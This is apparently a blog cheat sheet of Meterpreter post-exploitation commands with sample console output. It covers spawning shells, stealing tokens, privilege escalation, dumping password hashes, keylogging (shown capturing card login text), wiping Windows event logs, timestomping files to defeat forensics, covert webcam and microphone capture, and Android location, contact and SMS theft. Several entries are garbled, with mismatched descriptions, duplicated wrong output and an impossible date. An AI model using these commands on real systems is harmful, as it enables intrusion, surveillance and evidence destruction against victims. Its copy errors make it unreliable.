Meterpreter Complete Cheatsheet

meterpreter complete cheatsheet-feature

Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool.

Throughout this thread, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. And you are free to ask help for it.

list of commands covered:

core commands     File System commands     Networking Commands     User Interface        Other Useful commands
-------------     --------------------     -------------------     --------------        ---------------------
?                 cat                      ifconfig                enumdesktops          webcam_list
background        cd                       portfwd                 getdesktop            webcam_snap
bgkill            del                      route                   idletime              webcam_stream
bgrun             download                                         keyscan_start         record_mic
bglist            edit                     System Commands         keyscan_dump          activity_start
channel           getlwd                   ---------------         keyscan_stop          check_root
close             getwd                    clearev                 screenshot            geolocate
exit              lcd                      drop_token              set_desktop           wlan_geolocate
exploit           lpwd                     execute                 uictl                 dump_calllog
help              ls                       getpid                                        dump_contacts
interact          mkdir                    getprivs                Password hash         dump_sms
irb               pwd                      getuid                  -------------         send_sms
migrate           rm                       kill                    hashdump
quit              rmdir                    ps                      
read              upload                   reboot                  Timestomp commands
run               search                   reg                     ------------------
resource                                   rev2self                timestomp
use                                        shell
write                                      shutdown                Privilage Escalation
                                           steal_token             --------------------
                                           sys_info                getsystem

Note : bookmark this page as it is possibly the most complete cheat sheet of meterpreter commands found anywhere on the web, so you’ll want it to refer back to this sheet often.

Core commands


The ? command, as may be expected, displays the Meterpreter help menu.

  meterpreter > ?
  Core Commands
  Command       Description
  -------       -----------
  ?             Help menu
  background    Backgrounds the current session
  channel       Displays information about active channels


The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.

  meterpreter > background
  msf exploit(ms08_067_netapi) > sessions -i 1
  [*] Starting interaction with 1...


The bgkill command kills a background meterpreter script


The bgrun command runs a script as a background thread


The bglist command provides a list of all running background scripts


The channel command displays all active channels


The close command closes a channel


The exit command terminates a meterpreter session


The exploit command executes the meterpreter script designated after it


The help command, as may be expected, displays the Meterpreter help menu as ? command


The interact command starts to interact with a channel interacts with a channel


The irb command switches into Ruby scripting mode

  meterpreter > irb
  [*] Starting IRB shell
  [*] The 'client' variable holds the meterpreter client


Using the migrate post module, you can migrate to another process on the victim.

 meterpreter > run post/windows/manage/migrate 
 [*] Running module against V-MAC-XP
 [*] Current server process: svchost.exe (1076)
 [*] Migrating to explorer.exe...
 [*] Migrating into process ID 816
 [*] New server process: Explorer.EXE (816)


The quit command terminates the meterpreter session


The read command helps to reads the data from a channel


The run executes the meterpreter script designated after it


The resource command will execute Meterpreter instructions load inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).

 meterpreter > resource 
 Usage: resource path1 path2Run the commands stored in the supplied files.


The use command loads a meterpreter extension


The command command writes data to a channel

File system commands


The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.

  meterpreter > cat edit.txt
  What you talkin' about Willis


The change directory “cd” works the same way as it does under DOS and *nix systems.

 meterpreter > cd c:\windows
 meterpreter > pwd


The del command delete a file on the victim


The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. The -r option allows you to do so recursively.

  meterpreter > download c:\\boot.ini
  [*] downloading: c:\boot.ini -> c:\boot.ini
  [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini


The edit command opens a file located on the target host. It uses the ‘vim’ so all the editor’s commands are available.

 meterpreter > edit edit.txt


The getlwd command prints the local working directory


The lcd command changes working local directory. Changing the working directory will give your Meterpreter session access to files located in this folder.

 meterpreter > lcd /var/www
 meterpreter > lpwd


The lpwd display working local directory. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console.

 meterpreter > lpwd


As in Linux, the ls  command will list the files in the current remote directory.

 meterpreter > ls
 Listing: C:\Documents and Settings\victim
 Mode              Size     Type  Last modified                   Name
 ----              ----     ----  -------------                   ----
 40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
 40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
 100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
 40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data


The mkdir  command makes a directory in victim’s system


The pwd  command displays current working directly on the target host. By default, the current working folder is where the connection to your listener was initiated.


The rm  command as in *nix systems delete (remove) a file


The rmdir command as in *nix systems delete (remove) a directory


As with the download command, you need to use double-slashes with the upload command. It uploads a file into target system. The -r option allows you to do so recursively.


The search commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.

  meterpreter > search -f sea*.bat c:\\xamp\\
  Found 1 result...
  c:\\xampp\perl\bin\search.bat (57035 bytes)

Networking Commands

ifconfig, ipconfig

The ifconfig or ipconfig command displays the network interfaces and addresses on the remote machine.

 meterpreter > ipconfig
 MS TCP Loopback interface
 Hardware MAC: 00:00:00:00:00:00
 IP Address  :
 Netmask     :
 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
 Hardware MAC: 00:0c:29:10:f5:15
 IP Address  :
 Netmask     :


The portfwd command forwards a port on the victim system to a remote service


The route command helps to view or modify the victim routing table

System Commands


The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.

  meterpreter > clearev
  [*] Wiping 97 records from Application...
  [*] Wiping 415 records from System...
  [*] Wiping 0 records from Security...


The drop_token command drops a stolen token


The execute command runs a command on the target.

  meterpreter > execute -f cmd.exe -i -H
  Process 38320 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.


The getpid command gets the current process ID (PID)


The getprivs command gets as many privileges as possible

 meterpreter > getprivs 
 Enabled Process Privileges


The getuid command get the user that the server is running as host


Thekill command get the user that the server is running as host


The ps command displays a list of running processes on the target.

 meterpreter > ps
 Process list
 PID   Name                  Path
 ---   ----                  ----
 132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 288   snmp.exe              C:\WINDOWS\System32\snmp.exe


The reboot command reboots the victim computer


The reg command interact with the victim’s registry


The rev2self command calls RevertToSelf() on the victim machine


The shell command will present you with a standard shell on the target system.

 meterpreter > shell
 Process 39640 created.
 Channel 2 created.
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.


The shutdown command shuts down the victim’s computer


The steal_token command attempts to steal the token of a specified (PID) process


The sys_info command gets the details about the victim computer such as OS and name

UserInterface Commands


The enumdesktops command lists all accessible desktops

 meterpreter > enumdesktops
 Enumerating all accessible desktops
 Session  Station   Name
 -------  -------   ----
 0        WinSta0   Default
 0        WinSta0   Disconnect
 0        WinSta0   Winlogon
 0        SAWinSta  SADesktop


The getdesktop command gets the current meterpreter desktop


The idletime command checks to see how long since the victim system has been idle or inactive.

 meterpreter > idletime
 User has been idle for: 5 hours 26 mins 35 secs


The keyscan_start command starts the software keylogger when associated with a process such as Word or browser

 meterpreter > keyscan_start
 Starting the keystroke sniffer...


The keyscan_dump command starts the software keylogger when associated with a process such as Word or browser

 meterpreter > keyscan_dump
 Dumping captured keystrokes...
 tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword


The keyscan_stop command stops the software keylogger


The screenshot command grabs a screenshot of the meterpreter desktop


The set_desktop command changes the meterpreter desktop


The uictl command enables control of some of the user interface components

Privilege Escalation Commands


The getsystem command uses 15 built-in methods to gain sysadmin privileges

Password hash Commands


The hashdump post module will dump the contents of the SAM database.

 meterpreter > run post/windows/gather/hashdump 
 [*] Obtaining the boot key...
 [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
 [*] Obtaining the user list and keys...
 [*] Decrypting user keys...
 [*] Dumping password hashes...

Timestomp commands


The timestomp command manipulates the modify, access, and create attributes of a file

 meterpreter > timestomp -h
 Usage: timestomp OPTIONS file_path
 -a   Set the "last accessed" time of the file
 -b        Set the MACE timestamps so that EnCase shows blanks
 -c   Set the "creation" time of the file
 -e   Set the "mft entry modified" time of the file
 -f   Set the MACE of attributes equal to the supplied file
 -h        Help banner
 -m   Set the "last written" time of the file
 -r        Set the MACE timestamps recursively on a directory
 -v        Display the UTC MACE values of the file
 -z   Set all four attributes (MACE) of the file

Some other usefull commads


The webcam_list command lists all available wecams in target machine

 meterpreter > webcam_list
 1: Creative WebCam NX Pro
 2: Creative WebCam NX Pro (VFW)


The webcam_snap takes picture through webcam

  meterpreter > webcam_snap -h
  Usage: webcam_snap [options]
  Grab a frame from the specified webcam.
  -h      Help Banner
  -i   The index of the webcam to use (Default: 1)
  -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
  -q   The JPEG image quality (Default: '50')
  -v   Automatically view the JPEG image (Default: 'true')


The webcam_stream get live streaming of target

  meterpreter > webcam_snap -h
  Usage: webcam_snap [options]
  Grab a frame from the specified webcam.
  -h      Help Banner
  -i   The index of the webcam to use (Default: 1)
  -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
  -q   The JPEG image quality (Default: '50')
  -v   Automatically view the JPEG image (Default: 'true')


The record_mic gets recoreded soundtrack of target

  meterpreter > record_mic -d 20
  [*] Starting...
  [*] Stopped
  Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav


The activity_start is an execute command by starting an Android activity from a URI string.


The check_root checks the target is whether rooted or not

  meterpreter > check_root
  [*] Device is not rooted


The geolocate allows you to locate the phone by retrieving the current lat-long using geolocation.


The wlan_geolocate allows you to locate the phone by retrieving the current lat-long using WLAN information.

  meterpreter > wlan_geolocate
  [*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
  [*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******


The dump_calllog retrieves the call log from the Android device.

  meterpreter > dump_calllog
  [*] Fetching 500 entries
  [*] Contacts list saved to: calllog_dump_20160374745744.txt


The dump_contacts retrieves contacts from target

   meterpreter > dump_contacts
   [*] Fetching 5 contacts into list
   [*] Contacts list saved to: contacts_dump_20160308155744.txt

dump_smd, sms_dump

The dump_sms or sms_dump retrieves the sms information from the Android device.

   meterpreter > dump_contacts
   [*] Fetching 5 contacts into list
   [*] Contacts list saved to: contacts_dump_20160308155744.txt


The send allows to send sms from target machine

  meterpreter > send_sms -d 9678****** -t hacked
  [*] SMS send - Transmission succesfull

Stay Tuned for More Meterpreter Tips…😃

Related posts

Feedback !

Sorry if this tutorial seemed a bit mundane, but the information contained is still valuable! Don’t forget to voice your comments, questions, or concerns, I’m positive that they’ll all be addressed in some form.

Thanks for reading 😃

Leave a Reply

Your email address will not be published.